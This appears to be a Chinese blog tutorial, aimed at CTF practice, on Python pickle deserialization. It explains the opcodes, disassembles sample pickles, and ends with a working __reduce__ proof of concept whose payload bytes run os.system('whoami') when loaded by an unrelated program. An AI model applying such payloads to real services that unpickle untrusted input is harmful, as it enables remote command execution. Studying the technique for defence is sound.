Python反序列化

怪小生失了神

已于 2022-08-23 17:18:41 修改

阅读量1.4k

点赞数

文章标签： java 前端 html

于 2022-07-31 16:52:49 首次发布

本文链接：https://blog.csdn.net/qq_61209261/article/details/126085518

版权

什么是Python反序列化

python反序列化和php反序列化类似，相当于把程序运行时产生的变量，字典，对象实例等变换成字符串形式存储起来，以便后续调用，恢复保存前的状态

python中反序列化的库主要有两个，pickle和cpickle，这俩除了运行效率上有区别外，没什么区别

Python反序列化漏洞

pickle简介

序列化：pickle.dumps()将对象序列化为字符串、pickle.dump()将对象序列化后的字符串存储为文件

反序列化：pickle.loads()将字符串反序列化为对象、pickle.load()从文件中读取数据反序列化

使用dumps()与loads()时可以使用protocol参数指定协议版本

协议有0，1，2，3，4，5号版本，不同的python版本默认的协议版本不同。这些版本中，0号是最可读的，之后的版本为了优化加入了不可打印字符

协议是向下兼容的，0号版本也可以直接使用

pickle实际上是一门栈语言，它有不同的几种编写方式，通常我们人工编写的话，是使用protocol=0的方式来写。而读取的时候python会自动识别传入的数据使用哪种方式。

和传统语言中有变量、函数等内容不同，pickle这种堆栈语言，并没有“变量名”这个概念，所以可能有点难以理解。pickle的内容储存在如下两个位置中：

·stack 栈

·memo 一个列表，可以储存信息

pickle的常用方法有

import pickle
 
a_list = ['a','b','c']
 
print(pickle.dumps(a_list,protocol=0))
 
pickle.loads() #对象反序列化
pickle.load() #对象反序列化，从文件中读取数据

反序列化流程分析

在挖掘反序列化漏洞之前，需要了解python反序列化的流程是怎样的

直接分析反序列化出的字符串是比较困难的，我们可以使用pickletools帮助分析

import pickle
import pickletools
 
a_list = ['a','b','c']
 
a_list_pickle = pickle.dumps(a_list,protocol=0)
print(a_list_pickle)
# 优化一个已经被打包的字符串
a_list_pickle = pickletools.optimize(a_list_pickle)
print(a_list_pickle)
# 反汇编一个已经被打包的字符串
pickletools.dis(a_list_pickle)

指令集如下：（更具体可以查看pickletools.py）

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding
TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

对照理解

b'\x80\x03](X\x01\x00\x00\x00aX\x01\x00\x00\x00bX\x01\x00\x00\x00ce.'
    0: \x80 PROTO      3	#标明使用协议版本
    2: ]    EMPTY_LIST	#将空列表压入栈
    3: (    MARK	#将标志压入栈
    4: X        BINUNICODE 'a'	#unicode字符
   10: X        BINUNICODE 'b'
   16: X        BINUNICODE 'c'
   22: e        APPENDS    (MARK at 3)	#将3号标志后的数据压入列表
   # 弹出栈中的数据，结束流程
   23: .    STOP
highest protocol among opcodes = 2

再来一个

import pickle
import pickletools
import base64
 
class a_class():
    def __init__(self):
        self.age = 114514
        self.name = "QAQ"
        self.list = ["1919","810","qwq"]
a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new,protocol=3)
print(a_class_pickle)
# 优化一个已经被打包的字符串
a_list_pickle = pickletools.optimize(a_class_pickle)
print(a_class_pickle)
# 反汇编一个已经被打包的字符串
pickletools.dis(a_class_pickle)

b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03M\xe5\x07X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00tmxq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x05\x00\x00\x00donotq\x08X\x06\x00\x00\x00givemeq\tX\x04\x00\x00\x00hopeq\neub.'
b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03M\xe5\x07X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00tmxq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x05\x00\x00\x00donotq\x08X\x06\x00\x00\x00givemeq\tX\x04\x00\x00\x00hopeq\neub.'
    0: \x80 PROTO      3
    push self.find_class(modname,name);连续读取两个字符串作为参数，以\n为界
    # 这里就是self.find_class('__main__','a_class');
    # 需要注意的版本不同，find_class函数也不同
    2: c    GLOBAL     '__main__ a_class'
   20: q    BINPUT     0
#    向栈中压入一个元组
   22: )    EMPTY_TUPLE
#    大意为，该指令之前的栈内容应该为一个类（2行GLOBAL创建的类），类后为一个元组（22行压入的TUPLE），调用cls.__new__(cls, *args)（即用元组中的参数创建一个实例，这里元组实际为空）
   23: \x81 NEWOBJ
   24: q    BINPUT     1
#    压入一个新字典
   26: }    EMPTY_DICT
   27: q    BINPUT     2
#    一个标志
   29: (    MARK
#    压入unicode值
   30: X        BINUNICODE 'age'
   38: q        BINPUT     3
   40: M        BININT2    2021
   43: X        BINUNICODE 'name'
   52: q        BINPUT     4
   54: X        BINUNICODE 'tmx'
   62: q        BINPUT     5
   64: X        BINUNICODE 'list'
   73: q        BINPUT     6
   75: ]        EMPTY_LIST
   76: q        BINPUT     7
#    double mark
   78: (        MARK
   79: X            BINUNICODE 'donot'
   89: q            BINPUT     8
   91: X            BINUNICODE 'giveme'
  102: q            BINPUT     9
  104: X            BINUNICODE 'hope'
  113: q            BINPUT     10
#   将第78行mark后的值压入到第75行的列表
  115: e            APPENDS    (MARK at 78)
#   大意为将任意数量的键值对添加到现有字典中
#   tack before:  ... pydict markobject key_1 value_1 ... key_n value_n
#   Stack after:   ... pydict
  116: u        SETITEMS   (MARK at 29)
#   通过__setstate__或更新__dict__完成构建对象（对象为我们在23行创建的）
#   如果对象具有__setstate__方法，则调用anyobject.__setstate__（参数）
#   如果无__setstate__方法，则通过anyobject.__dict__.update(argument)更新值
#   注意这里可能产生变量覆盖
  117: b    BUILD
#   弹出栈中的数据，结束流程
  118: .    STOP
highest protocol among opcodes = 2

漏洞分析

RCE：常用的reduce

ctf中常见的pickle反序列化，利用的方法大多是__reduce__

触发__reduce__的指令码为R

# pickletools.py 1955行
name='REDUCE',
      code='R',
      arg=None,
      stack_before=[anyobject, anyobject],
      stack_after=[anyobject],
      proto=0,
      doc="""Push an object built from a callable and an argument tuple.
      The opcode is named to remind of the __reduce__() method.
      Stack before: ... callable pytuple
      Stack after:  ... callable(*pytuple)
      The callable and the argument tuple are the first two items returned
      by a __reduce__ method.  Applying the callable to the argtuple is
      supposed to reproduce the original object, or at least get it started.
      If the __reduce__ method returns a 3-tuple, the last component is an
      argument to be passed to the object's __setstate__, and then the REDUCE
      opcode is followed by code to create setstate's argument, and then a
      BUILD opcode to apply  __setstate__ to that argument.
      If not isinstance(callable, type), REDUCE complains unless the
      callable has been registered with the copyreg module's
      safe_constructors dict, or the callable has a magic
      '__safe_for_unpickling__' attribute with a true value.  I'm not sure
      why it does this, but I've sure seen this complaint often enough when
      I didn't want to <wink>.
      """

只要在序列化中的字符串存在R指令，__reduce__方法就会被执行，无论正常程序中是否写明了__reduce__方法

import pickle
import pickletools
import base64
 
class a_class():
	def __init__(self):
		self.age = 2021
		self.name = "tmx"
		self.list = ["donot","giveme","hope"]
	def __reduce__(self):
		return (__import__('os').system, ("whoami",))
		
a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new,protocol=3)
print(a_class_pickle)
# 优化一个已经被打包的字符串
a_list_pickle = pickletools.optimize(a_class_pickle)
print(a_class_pickle)
# 反汇编一个已经被打包的字符串
pickletools.dis(a_class_pickle)
 
'''
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
    0: \x80 PROTO      3
    2: c    GLOBAL     'nt system'
   13: q    BINPUT     0
   15: X    BINUNICODE 'whoami'
   26: q    BINPUT     1
   28: \x85 TUPLE1
   29: q    BINPUT     2
   31: R    REDUCE
   32: q    BINPUT     3
   34: .    STOP
highest protocol among opcodes = 2
'''

把生成的payload拿到无__reduce__的正常程序中，命令仍然会被执行

import pickle
import pickletools
import base64
 
class a_class():
	def __init__(self):
		self.age = 2021
		self.name = "tmx"
		self.list = ["donot","giveme","hope"]

		
a_class_pickle = pickle.loads(b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.')

开摆了